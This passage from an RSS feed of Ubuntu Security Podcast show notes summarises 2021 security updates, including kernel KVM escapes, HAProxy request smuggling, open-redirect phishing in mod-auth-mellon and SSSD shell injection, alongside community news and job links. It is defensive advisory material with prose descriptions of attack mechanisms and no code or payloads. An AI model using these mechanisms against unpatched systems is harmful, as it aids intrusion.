<li><a href="https://ubuntu.com/security/CVE-2021-3737">CVE-2021-3737</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3733">CVE-2021-3733</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ReDOS - a malicious HTTP server which would send a crafted response for
BasicAuth which would cause high CPU usage in trying to match the header
value via a regex - fixed to use a simpler regex</li>
<li>Malicious server could cause a client to hang even if the client had set
a timeout - server sends a &lsquo;100 Continue&rsquo; response and the client would
sit there waiting to receive more input which would never arrive (since
server is malicious)</li>
</ul>
<h3 id="usn-5084-1-libtiff-vulnerability-08-32">[<a href="https://ubuntu.com/security/notices/USN-5084-1">USN-5084-1</a>] LibTIFF vulnerability [08:32]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-19143">CVE-2020-19143</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer overflow via crafted TIFF file</li>
</ul>
<h3 id="usn-5079-4-curl-regression-08-42">[<a href="https://ubuntu.com/security/notices/USN-5079-4">USN-5079-4</a>] curl regression [08:42]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-22947">CVE-2021-22947</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22946">CVE-2021-22946</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mistake in backporting patch would cause STARTTLS to fail when used for
SMTP only - thanks for tuaris for metioning this on
<a href="https://ubuntuforums.org/showthread.php?t=2467177">https://ubuntuforums.org/showthread.php?t=2467177</a> but next time please
file a LP bug directly as you will get our attention much faster (and
more reliably)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="authenticated-boot-and-disk-encryption-on-linux-09-28">Authenticated boot and disk encryption on Linux [09:28]</h3>
<ul>
<li><a href="http://0pointer.net/blog/authenticated-boot-and-disk-encryption-on-linux.html">http://0pointer.net/blog/authenticated-boot-and-disk-encryption-on-linux.html</a></li>
<li>systemd focused review of existing FDE in general purpose Linux distros
with pointers to proposed mechanisms to implement authenticated FDE etc
<ul>
<li>Laments lack of authenticated initrd, use of TPMs etc</li>
<li>Proposal is quite different than traditional distros - immutable,
authenticated <code>/usr</code>, encrypted, authenticated <code>/etc</code>, <code>/var</code> and per-user
<code>/home/user</code> encryption using their own login password</li>
</ul>
</li>
<li><a href="https://ubuntu.com/blog/ubuntu-core-20-secures-linux-for-iot">UC20 already does TPM backed FDE with authentication</a></li>
</ul>
<h3 id="ubuntu-14-dot-04-and-16-dot-04-esm-extended-14-16">Ubuntu 14.04 and 16.04 ESM extended [14:16]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/ubuntu-14-04-and-16-04-lifecycle-extended-to-ten-years">https://ubuntu.com/blog/ubuntu-14-04-and-16-04-lifecycle-extended-to-ten-years</a></li>
<li>Total of 10 years of support (5 LTS, 5 ESM)</li>
</ul>
<table>
  <thead>
      <tr>
          <th>RELEASE</th>
          <th>RELEASE DATE</th>
          <th>END OF LIFE*</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Ubuntu 14.04 (Trusty Tahr)</td>
          <td>April 2014</td>
          <td>April 2024(from April 2022)</td>
      </tr>
      <tr>
          <td>Ubuntu 16.04 (Xenial Xerus)</td>
          <td>April 2016</td>
          <td>April 2026(from April 2024)</td>
      </tr>
      <tr>
          <td>Ubuntu 18.04 (Bionic Beaver)</td>
          <td>April 2018</td>
          <td>April 2028(unchanged)</td>
      </tr>
      <tr>
          <td>Ubuntu 20.04 (Focal Fossa)</td>
          <td>April 2020</td>
          <td>April 2030(unchanged)</td>
      </tr>
  </tbody>
</table>
<ul>
<li>Use extra time to plan upgrades</li>
</ul>
<h3 id="hiring-15-48">Hiring [15:48]</h3>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a></li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a></li>
</ul>
<h4 id="security-product-manager">Security Product Manager</h4>
<ul>
<li><a href="https://canonical.com/careers/2278145/security-product-manager-remote">https://canonical.com/careers/2278145/security-product-manager-remote</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E132.mp3" length="13439023" type="audio/mpeg" /><itunes:duration>17:08</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 131
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-131/</link>
          <pubDate>Fri, 17 Sep 2021 13:55:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>e001fb1a9fb95922d8e44e8cd29fa7be2e673cd366fca7e76db4c8657fbd5ac2aa72463b618a8a10495f79567c71e44f1168b70db449f20732a42cdda3e4f482</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 131</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          OWASP Top 10 gets updated for 2021 and we look at security vulnerabilities
  in the Linux kernel, Ghostscript, Git, curl and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  OWASP Top 10 gets updated for 2021 and we look at security vulnerabilities
  in the Linux kernel, Ghostscript, Git, curl and more.
  </itunes:summary>
        <description>  OWASP Top 10 gets updated for 2021 and we look at security vulnerabilities
  in the Linux kernel, Ghostscript, Git, curl and more.
  </description>
        <googleplay:description>  OWASP Top 10 gets updated for 2021 and we look at security vulnerabilities
  in the Linux kernel, Ghostscript, Git, curl and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>OWASP Top 10 gets updated for 2021 and we look at security vulnerabilities
in the Linux kernel, Ghostscript, Git, curl and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>26 unique CVEs addressed</p>
<h3 id="usn-5069-2-mod-auth-mellon-vulnerability-00-43">[<a href="https://ubuntu.com/security/notices/USN-5069-2">USN-5069-2</a>] mod-auth-mellon vulnerability [00:43]</h3>
<ul>
<li>1 CVEs addressed in Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3639">CVE-2021-3639</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-130/">Episode 130</a> - failed to properly handle crafted redirect links -&gt; open
redirect</li>
</ul>
<h3 id="usn-5070-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5070-1">USN-5070-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38207">CVE-2021-38207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38206">CVE-2021-38206</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38200">CVE-2021-38200</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38198">CVE-2021-38198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3612">CVE-2021-3612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34693">CVE-2021-34693</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22543">CVE-2021-22543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26541">CVE-2020-26541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3653">CVE-2021-3653</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3656">CVE-2021-3656</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5071-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5071-1">USN-5071-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3612">CVE-2021-3612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22543">CVE-2021-22543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36311">CVE-2020-36311</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3653">CVE-2021-3653</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3656">CVE-2021-3656</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5072-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5072-1">USN-5072-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3653">CVE-2021-3653</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3656">CVE-2021-3656</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5073-1-linux-kernel-vulnerabilities-00-56">[<a href="https://ubuntu.com/security/notices/USN-5073-1">USN-5073-1</a>] Linux kernel vulnerabilities [00:56]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38160">CVE-2021-38160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3612">CVE-2021-3612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34693">CVE-2021-34693</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3653">CVE-2021-3653</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3656">CVE-2021-3656</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different AMD specific issue in KVM subsystem with nested
virtualisation - 1 mentioned last week in <a href="https://ubuntusecuritypodcast.org/episode-130/">Episode 130</a> - would fail to
validate particular operations which could be performed by a guest VM -
in this case would allow a guest to enable the Advanced Virtual Interrupt
Controller for a nested VM (ie L2 VM) - this would then allow the L2 VM
to write to host memory -&gt; code execution on the host</li>
<li>The other - L1 guest could disable interception of both VMLOAD/VMSAVE
calls for a L2 guest - L2 guest could then read/write portions of host
physical memory - code-exec on host</li>
</ul>
<h3 id="lsn-0081-1-linux-kernel-vulnerability-01-56">[<a href="https://ubuntu.com/security/notices/LSN-0081-1">LSN-0081-1</a>] Linux kernel vulnerability [01:56]</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33909">CVE-2021-33909</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22555">CVE-2021-22555</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3656">CVE-2021-3656</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3653">CVE-2021-3653</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>(<a href="https://ubuntusecuritypodcast.org/episode-124/">Episode 124</a>) seq_file vuln - this virt file-system contained an unsigned integer
conversion error - would result in a local user being able to cause an
OOB write and hence possible code-exec in the kernel -&gt; privesc</li>
<li>(<a href="https://ubuntusecuritypodcast.org/episode-127/">Episode 127</a>) netfilter setsockopt() - OOB write</li>
<li>AMD nested virtualisation issues above</li>
</ul>
<h3 id="usn-5074-1-firefox-vulnerabilities-02-53">[<a href="https://ubuntu.com/security/notices/USN-5074-1">USN-5074-1</a>] Firefox vulnerabilities [02:53]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38494">CVE-2021-38494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38493">CVE-2021-38493</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38491">CVE-2021-38491</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Memory safety bugs -&gt; possible memory corruption, possible bypass in
mixed content blocking (ie http content on a https page)</li>
</ul>
<h3 id="usn-5075-1-ghostscript-vulnerability-03-36">[<a href="https://ubuntu.com/security/notices/USN-5075-1">USN-5075-1</a>] Ghostscript vulnerability [03:36]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3781">CVE-2021-3781</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Trivial bypass of sandbox - exploit was apparently known about since
March and publicly available since end of August but only reported to GS
upstream on 8th August - fix available since 9th, updates for Ubuntu
published on 10th (rare Friday publication)</li>
</ul>
<h3 id="usn-5076-1-git-vulnerability-04-55">[<a href="https://ubuntu.com/security/notices/USN-5076-1">USN-5076-1</a>] Git vulnerability [04:55]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-40330">CVE-2021-40330</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible cross-protocol requests by embedding a newline in the URL when
cloning</li>
</ul>
<h3 id="usn-5077-1-usn-5077-2-apport-vulnerabilities-05-34">[<a href="https://ubuntu.com/security/notices/USN-5077-1">USN-5077-1</a>, <a href="https://ubuntu.com/security/notices/USN-5077-2">USN-5077-2</a>] Apport vulnerabilities [05:34]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3710">CVE-2021-3710</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3709">CVE-2021-3709</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Arbitrary file reads in apport crash handling - reads certain file when
apps crash, can be tricked to read other files and include these in the
crash report which can then be seen by the user, uploaded to
errors.ubuntu.com etc</li>
</ul>
<h3 id="usn-5078-1-squashfs-tools-vulnerability-06-46">[<a href="https://ubuntu.com/security/notices/USN-5078-1">USN-5078-1</a>] Squashfs-Tools vulnerability [06:46]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41072">CVE-2021-41072</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Similar to <a href="https://ubuntusecuritypodcast.org/episode-129/">Episode 129</a> - symlink and file of same name - when unsquash,
write out symlink, then write out file traversing the symlink -&gt;
arbitrary file overwrite</li>
</ul>
<h3 id="usn-5079-1-usn-5079-2-curl-vulnerabilities-07-48">[<a href="https://ubuntu.com/security/notices/USN-5079-1">USN-5079-1</a>, <a href="https://ubuntu.com/security/notices/USN-5079-2">USN-5079-2</a>] curl vulnerabilities [07:48]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-22947">CVE-2021-22947</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22946">CVE-2021-22946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22945">CVE-2021-22945</a> <!-- raw HTML omitted --> (non-ESM only)</li>
</ul>
</li>
<li>MQTT OOB write (malicious MQTT server) (non-ESM)</li>
<li>Possible to cause to not upgrade to TLS even when specified -&gt; info leak</li>
<li>STARTTLS -&gt; could inject responses / intercept comms etc</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="owasp-top-10-updated-after-4-years-08-55">OWASP Top 10 updated after 4 years [08:55]</h3>
<ul>
<li><a href="https://owasp.org/Top10/">https://owasp.org/Top10/</a></li>
<li>Last updated in Nov 2017</li>
<li>Increasing complexity of web-apps means vulns are now at the edges -
ie. when combining two components, misconfigure one of them -&gt; vuln in
combination due to accidential misuse by the other component</li>
</ul>
<h3 id="hiring-13-11">Hiring [13:11]</h3>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a></li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E131.mp3" length="11565844" type="audio/mpeg" /><itunes:duration>14:23</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 130
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-130/</link>
          <pubDate>Fri, 10 Sep 2021 14:21:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>f1c770789e830b60f021a769a30c975ed0121e49ba25c924fc675d70e9be1a2f02f279d2d3f6699cdfd9b70952436b9e367071c5e4e5335069236f80a17ff1e1</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 130</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we discuss compiler warnings as build errors in the Linux kernel,
  plus we look at security updates for HAProxy, GNU cpio, PySAML2,
  mod-auth-mellon and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we discuss compiler warnings as build errors in the Linux kernel,
  plus we look at security updates for HAProxy, GNU cpio, PySAML2,
  mod-auth-mellon and more.
  </itunes:summary>
        <description>  This week we discuss compiler warnings as build errors in the Linux kernel,
  plus we look at security updates for HAProxy, GNU cpio, PySAML2,
  mod-auth-mellon and more.
  </description>
        <googleplay:description>  This week we discuss compiler warnings as build errors in the Linux kernel,
  plus we look at security updates for HAProxy, GNU cpio, PySAML2,
  mod-auth-mellon and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we discuss compiler warnings as build errors in the Linux kernel,
plus we look at security updates for HAProxy, GNU cpio, PySAML2,
mod-auth-mellon and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>15 unique CVEs addressed</p>
<h3 id="usn-5051-4-openssl-regression-00-51">[<a href="https://ubuntu.com/security/notices/USN-5051-4">USN-5051-4</a>] OpenSSL regression [00:51]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3712">CVE-2021-3712</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-129/">Episode 129</a></li>
<li>Original backport of patch contained a typo which introduced a regression
where ASN1_STRINGs would fail to print in some cases</li>
</ul>
<h3 id="usn-5062-1-linux-kernel-vulnerability-01-20">[<a href="https://ubuntu.com/security/notices/USN-5062-1">USN-5062-1</a>] Linux kernel vulnerability [01:20]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3653">CVE-2021-3653</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>AMD specific issue in KVM subsystem with nested virtualisation - would
fail to validate particular operations which could be performed by a
guest VM - in this case would allow a guest to enable the Advanced
Virtual Interrupt Controller for a nested VM (ie L2 VM) - this would then
allow the L2 VM to write to host memory -&gt; code execution on the host</li>
</ul>
<h3 id="usn-5063-1-haproxy-vulnerabilities-02-40">[<a href="https://ubuntu.com/security/notices/USN-5063-1">USN-5063-1</a>] HAProxy vulnerabilities [02:40]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-40346">CVE-2021-40346</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow in handling of header name lengths - most significant
bit of header <strong>name</strong> length could slip into the LSB of header <strong>value</strong>
length - could then craft a valid request that would inject a dummy
content-length on input, this would then be reproduced on the output as
well as the original correct header length - can then get a &ldquo;blind&rdquo;
request smuggling attack since the extra request bypasses ACL checking
etc</li>
</ul>
<h3 id="usn-5064-1-gnu-cpio-vulnerability-04-13">[<a href="https://ubuntu.com/security/notices/USN-5064-1">USN-5064-1</a>] GNU cpio vulnerability [04:13]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38185">CVE-2021-38185</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow -&gt; heap buffer overflow in the handling of pattern
files - this allows to specify a file which contains a list of patterns
to match against filenames in the cpio archive which should be
extracted - is not clear if can easily abuse this as a remote attacker
since would need to be able to supply a crafted pattern file and have
this get used but these are not often used in practice</li>
</ul>
<h3 id="usn-5065-1-open-vswitch-vulnerability-05-08">[<a href="https://ubuntu.com/security/notices/USN-5065-1">USN-5065-1</a>] Open vSwitch vulnerability [05:08]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-36980">CVE-2021-36980</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in decoding of RAW_ENCAP actions - remote attacker could craft one -&gt;
crash / RCE..?</li>
</ul>
<h3 id="usn-5066-1-usn-5066-2-pysaml2-vulnerability-05-39">[<a href="https://ubuntu.com/security/notices/USN-5066-1">USN-5066-1</a>, <a href="https://ubuntu.com/security/notices/USN-5066-2">USN-5066-2</a>] PySAML2 vulnerability [05:39]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21239">CVE-2021-21239</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>pysaml2 uses xmlsec1 binary to validate cryptographic signatures on SAML
documents</li>
<li>By default xmlsec will accept any type of key found in the document to
verify the signature - so an attacker could embed their own signature
using just a HMAC and this would get validated as correct without even
consulting the X509 cert which should be used to validate the document -
simple fix to just change the CLI arguments to xmlsec1 to specify that it
should validate based on x509 certs</li>
</ul>
<h3 id="usn-5067-1-sssd-vulnerabilities-07-06">[<a href="https://ubuntu.com/security/notices/USN-5067-1">USN-5067-1</a>] SSSD vulnerabilities [07:06]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3621">CVE-2021-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3811">CVE-2019-3811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16838">CVE-2018-16838</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10852">CVE-2018-10852</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible shell command injection via the sssctl binary using the
logs-fetch and cache-expire subcommands - if could trick root into
running crafted commands could then get root&hellip; - was as a result of
using the system() syscall which evaluates a string to the shell - so
allows shell command injection directly - was fixed to instead use
fork() + execvp() on an array of arguments - which doesn&rsquo;t go via the
shell to run the specified subcommand</li>
<li>common pattern for security vulns, something we specifically look for
when auditing packages as part of the security review for MIRs</li>
</ul>
<h3 id="usn-5069-1-mod-auth-mellon-vulnerability-08-54">[<a href="https://ubuntu.com/security/notices/USN-5069-1">USN-5069-1</a>] mod-auth-mellon vulnerability [08:54]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3639">CVE-2021-3639</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>SAML2 auth module for Apache</li>
<li>Failed to filter URLS that start with <code>///</code> - an attacker could craft a URL
that specified a particular URL via the <code>ReturnTo</code> parameter and this would
then automatically redirect the user to that crafted URL - so could be
used for phishing attacks that look more trustworthy. ie. an attacker
creates a phishing site that copies the victim site at their own
domain. they then send an email to a user asking them to login and they
specify a URL to the real victim site but with the <code>ReturnTo</code> parameter set
to their own site - a user looking at this URL will see it specifies the
real site so won&rsquo;t be concerned - when they visit it they get
automatically redirected to the victim site - so if they don&rsquo;t then check
the URL they will start logging into the fake phishing site and not the
real one - fixed to just reject these URLs so they don&rsquo;t get abused by
the redirect process</li>
</ul>
<h3 id="usn-5068-1-gd-library-vulnerabilities-10-24">[<a href="https://ubuntu.com/security/notices/USN-5068-1">USN-5068-1</a>] GD library vulnerabilities [10:24]</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38115">CVE-2021-38115</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-40145">CVE-2021-40145</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-381">CVE-2021-381</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6363">CVE-2017-6363</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Crafted image files -&gt; OOB read / write - crash / code exec</li>
<li>One in TGA handling but others in the proprietary GD/GD2 formats which
upstream say is now deprecated so shouldn&rsquo;t get a CVE - recommend if you
are processing GD/GD2 image files from untrusted sources that you stop as
upstream may stop issuing updates for these / may not get CVEs</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="linux-kernel-enables-werror-11-33">Linux kernel enables -Werror [11:33]</h3>
<ul>
<li>Initially <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3fe617ccafd6f5bb33c2391d6f4eeb41c1fd0151">enabled by default</a>, <a href="https://lore.kernel.org/linux-hardening/CAHk-=wj4EG=kCOaqyPEq5VXa97kyUHsBpBn3DWwE91qcnDytOQ@mail.gmail.com/">in response</a> to patches from Kees Cook @
Google which introduced a bunch of new warnings - Linus wants a clean
build</li>
<li><a href="https://lore.kernel.org/linux-security-module/20210907183843.33028-1-ndesaulniers@google.com/">Lots of push back</a> since this then immediately broke a heap of CI systems
as there a lots of existing bits of kernel code that generates warnings -
and depending on what config options you enable you compile different
bits of code so can see or not see various warnings - and hence different
architectures etc - even having a <a href="https://lore.kernel.org/linux-hardening/202109061009.3C4B6114C3@keescook/">different locale / LANG setting</a> can
result in different compiler warnings as Kees found due to the nature of
some of the tests</li>
<li>Given the huge codebase with so many different configurations is almost
impossible to test them all and find all the various warnings, let alone
actually fix them</li>
<li>For years folks have been trying to drive down the warnings but is still
a hard and ongoing effort</li>
